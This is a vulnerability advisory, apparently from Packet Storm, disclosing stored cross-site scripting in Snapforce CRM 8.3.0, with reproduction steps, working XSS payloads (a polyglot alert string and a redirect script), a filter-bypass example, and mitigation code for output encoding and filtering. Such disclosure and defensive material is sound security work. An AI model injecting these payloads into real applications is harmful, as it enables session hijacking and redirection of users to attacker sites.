
Snapforce CRM 8.3.0 Cross Site Scripting

Posted Aug 22, 2019
Authored by Prasad Lingamaiah

Snapforce CRM version 8.3.0 suffers from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 403447c47a23972c08fcd81b4ca4c307c382f8f88d26a94eda5723546375a418

Hello Team,

Greetings. There is a list of XSS vulnerabilities and a concurrent login
weakness in the Snapforce application
<https://crm.snapforce.com/prodigy/login.php?timeout> (version 8.3.0).



*Vulnerability List: *

1. Stored Cross Site Scripting

2. Stored Cross Site Scripting through UI Redirection

3. Concurrent Logins are Allowed

*Affected URL: *

https://crm.snapforce.com/prodigy/login.php



*Steps to reproduce:*

1. Log in to the application at https://crm.snapforce.com/prodigy/login.php.

2. Go to the Accounts creation page and create a new Account.

3. Fill in all required fields, insert an XSS payload in the Description
field, and save.

4. Once the payload is saved in the Description field, it executes whenever
that description is rendered (stored cross site scripting).

5. The application can redirect to an attacker-controlled site; in my case I
redirected it to the google.com page.

6. For more information, please see the attached file.



*Payloads:*
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

<script>document.location='https://google.com'</script>
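As an added example (not code from the advisory or from Snapforce), the two payloads above traced through three constructed render templates that interpolate the saved Description field raw: an HTML body, a double-quoted attribute, and an inline JavaScript string literal. The templates, the small tokenizer and the stub alert/document are assumptions made so it runs offline; the tokenizer mimics how a browser finds script elements (a `<` inside a quoted attribute value is not a tag, and script content ends at the first `</script` regardless of the JavaScript around it). The first payload is a polyglot and fires in every context; the second only does anything when the field lands directly in the HTML body:

```javascript
// Added example; not code from the advisory or from Snapforce. Traces the two
// stored payloads through three constructed render contexts and reports what
// a browser would execute in each.
const PAYLOAD_POLYGLOT =
  `';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>`;
const PAYLOAD_REDIRECT = "<script>document.location='https://google.com'</script>";

// Hypothetical templates standing in for places an account description might
// be rendered without encoding: HTML body, quoted attribute, inline JS string.
const CONTEXTS = {
  htmlBody: (d) => `<p class="description">${d}</p>`,
  attribute: (d) => `<input name="description" value="${d}">`,
  jsString: (d) => `<script>var description = '${d}';</script>`,
};

// Return the bodies of <script> elements as a browser's tokenizer sees them:
// '<' inside a quoted attribute value is not a tag, and script content runs
// up to the first "</script" whatever the JavaScript inside looks like.
function scriptBodies(html) {
  const bodies = [];
  let i = 0;
  while (i < html.length) {
    if (html[i] !== '<') { i++; continue; }
    const tag = /^<(\/?)([A-Za-z][A-Za-z0-9]*)/.exec(html.slice(i));
    if (!tag) { i++; continue; }
    const isEndTag = tag[1] === '/';
    const name = tag[2].toLowerCase();
    let j = i + tag[0].length;
    let quote = null;        // quote character of the attribute value being read
    let afterEquals = false; // a quote opens a value only directly after '='
    for (; j < html.length; j++) {
      const c = html[j];
      if (quote) { if (c === quote) quote = null; }
      else if (c === '>') break;
      else if ((c === '"' || c === "'") && afterEquals) { quote = c; afterEquals = false; }
      else if (c === '=') afterEquals = true;
      else if (!/\s/.test(c)) afterEquals = false;
    }
    i = j + 1; // position just after the '>' that closed the tag
    if (name === 'script' && !isEndTag) {
      const end = html.slice(i).search(/<\/script/i);
      bodies.push(end < 0 ? html.slice(i) : html.slice(i, i + end));
      i = end < 0 ? html.length : i + end;
    }
  }
  return bodies;
}

// Execute each script body with stub alert/document so the effect is visible
// offline. A body a browser would reject as a syntax error is counted, not run.
function runScripts(html) {
  const result = { alerts: [], redirect: null, syntaxErrors: 0 };
  const fakeDocument = {};
  for (const body of scriptBodies(html)) {
    try {
      new Function('alert', 'document', body)(
        (msg) => result.alerts.push(String(msg)), fakeDocument);
    } catch (e) {
      if (e instanceof SyntaxError) result.syntaxErrors++; else throw e;
    }
  }
  result.redirect = fakeDocument.location || null;
  return result;
}

// Run one payload through every context; returns { contextName: result }.
function analyse(payload) {
  const out = {};
  for (const [name, render] of Object.entries(CONTEXTS)) out[name] = runScripts(render(payload));
  return out;
}

for (const [label, payload] of [['polyglot', PAYLOAD_POLYGLOT], ['redirect', PAYLOAD_REDIRECT]]) {
  console.log(label, JSON.stringify(analyse(payload)));
}
```

Run it with node. For the polyglot the inline-JS context fires twice (once when the payload terminates the string literal, once from the trailing SCRIPT element after the browser closes the first script at `</SCRIPT>`); the redirect payload is a syntax error inside a JS string and inert inside a quoted attribute, which is why the advisory's first payload is the one to test with.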

*Mitigation:*

https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet



• Output encoding: implement output encoding to convert untrusted input into a
safe form, so that it is displayed to the user as data rather than executed as
code by the browser.



Java HTML encoding function

    import java.text.StringCharacterIterator;

    public static String HTMLEncode(String aTagFragment) {
        final StringBuffer result = new StringBuffer();
        final StringCharacterIterator iterator =
            new StringCharacterIterator(aTagFragment);
        char character = iterator.current();
        while (character != StringCharacterIterator.DONE) {
            // replace each markup-significant character with its HTML entity
            if (character == '<') result.append("&lt;");
            else if (character == '>') result.append("&gt;");
            else if (character == '\"') result.append("&quot;");
            else if (character == '\'') result.append("&#39;");
            else if (character == '\\') result.append("&#92;");
            else if (character == '&') result.append("&amp;");
            else {
                // the char is not a special one
                // add it to the result as is
                result.append(character);
            }
            character = iterator.next();
        }
        return result.toString();
    }



• Escaping: escape all untrusted data according to the HTML context (body,
attribute, JavaScript, CSS, or URL) it will be placed into; an encoder for the
HTML body does not make data safe inside an attribute or a script block.

ESAPI API

    String safe = ESAPI.encoder().encodeForHTML( request.getParameter( "input" ) );

The same Encoder provides encodeForHTMLAttribute, encodeForJavaScript,
encodeForCSS and encodeForURL for the other contexts.



• Filtering input parameters: positive ("whitelist") input validation with
appropriate canonicalization is the recommended filtering technique.
Alternatively, black-list filtering works by removing some or all special
characters from the input. This is weaker: it mangles legitimate data (company
names with brackets, phone numbers with + and -, percentages) and only removes
the characters that matter in one output context, so treat it as defence in
depth alongside output encoding, not as a replacement for it. Special
characters are characters that enable script to be generated within an HTML
stream. Special characters include the following:

<> " ' % ; ) ( & + -

JavaScript code

    function RemoveBad(strTemp) {
        strTemp = strTemp.replace(/\<|\>|\"|\'|\%|\;|\(|\)|\&|\+|\-/g,"");
        return strTemp;
    }
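The escaping and filtering recommendations above, as an added example that is not code from the advisory, OWASP or Snapforce: one encoder per output context (modelled on the ESAPI methods named above), a constructed account template that uses the right encoder in each slot, and the advisory's own RemoveBad() run over constructed CRM data to show what the blacklist costs and where it still fails. The template, the sample description and the unquoted-attribute slot are assumptions for illustration.

```javascript
// Added example; not code from the advisory, OWASP or Snapforce. Per-context
// output encoders, a hardened render of the Description field, and the
// advisory's blacklist filter side by side on constructed data.
const PAYLOAD_POLYGLOT =
  `';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>`;

// HTML body context: the characters that can start or end markup.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
function encodeForHTML(s) {
  return String(s).replace(/[&<>"'/]/g, (c) => HTML_ENTITIES[c]);
}

// Quoted attribute context: everything but [A-Za-z0-9] becomes &#xHH; so no
// character can close the quote or start a new attribute.
function encodeForHTMLAttribute(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => `&#x${c.charCodeAt(0).toString(16).toUpperCase()};`);
}

// JavaScript string-literal context: \xHH / \uHHHH escapes. The JS engine
// decodes them back to the original characters, but the HTML parser never
// sees a quote, a '<' or a "</script" inside the literal.
function encodeForJavaScript(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? `\\x${code.toString(16).padStart(2, '0').toUpperCase()}`
      : `\\u${code.toString(16).padStart(4, '0').toUpperCase()}`;
  });
}

// URL query-parameter context.
function encodeForURL(s) {
  return encodeURIComponent(String(s));
}

// Hardened account page (constructed template): each slot is encoded for the
// context it lands in.
function renderAccountSafe(description) {
  return [
    `<p class="description">${encodeForHTML(description)}</p>`,
    `<input name="description" value="${encodeForHTMLAttribute(description)}">`,
    `<script>var description = '${encodeForJavaScript(description)}';</script>`,
    `<a href="/search?q=${encodeForURL(description)}">find similar accounts</a>`,
  ].join('\n');
}

// Count <script> openings in rendered markup; the safe page should contain
// only the one the template itself writes.
function countScriptTags(html) {
  return (html.match(/<script/gi) || []).length;
}

// What the JS engine sees for the inline literal: proves the encoding is
// lossless for the application while harmless for the HTML parser.
function jsRoundTrip(s) {
  return new Function(`return '${encodeForJavaScript(s)}';`)();
}

// The advisory's blacklist filter, copied verbatim for comparison.
function RemoveBad(strTemp) {
  strTemp = strTemp.replace(/\<|\>|\"|\'|\%|\;|\(|\)|\&|\+|\-/g, "");
  return strTemp;
}

// Constructed CRM data: legitimate text the blacklist destroys, and a value it
// passes untouched that is live in an unquoted attribute (no brackets, quotes
// or ';' are needed: an on* handler with a tagged-template call alert`XSS`).
const LEGIT_DESCRIPTION = 'Acme Widgets (UK) Ltd - contact +44 (0)20 7946 0958; 50% of revenue';
const UNQUOTED_ATTRIBUTE_BYPASS = 'x onmouseover=alert`XSS`';
function renderUnquotedAttribute(d) {
  return `<input name="description" value=${RemoveBad(d)}>`; // hypothetical weak template
}

console.log(renderAccountSafe(PAYLOAD_POLYGLOT));
console.log(RemoveBad(LEGIT_DESCRIPTION));
console.log(renderUnquotedAttribute(UNQUOTED_ATTRIBUTE_BYPASS));
```

Run it with node. The encoded page keeps the polyglot as inert text in all four slots and the inline literal decodes back to the exact stored value, while RemoveBad() strips the brackets, dashes, plus sign and percent from an ordinary CRM record and still lets an event-handler payload through untouched when the value lands in an unquoted attribute.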
packet storm

© 2022 Packet Storm. All rights reserved.
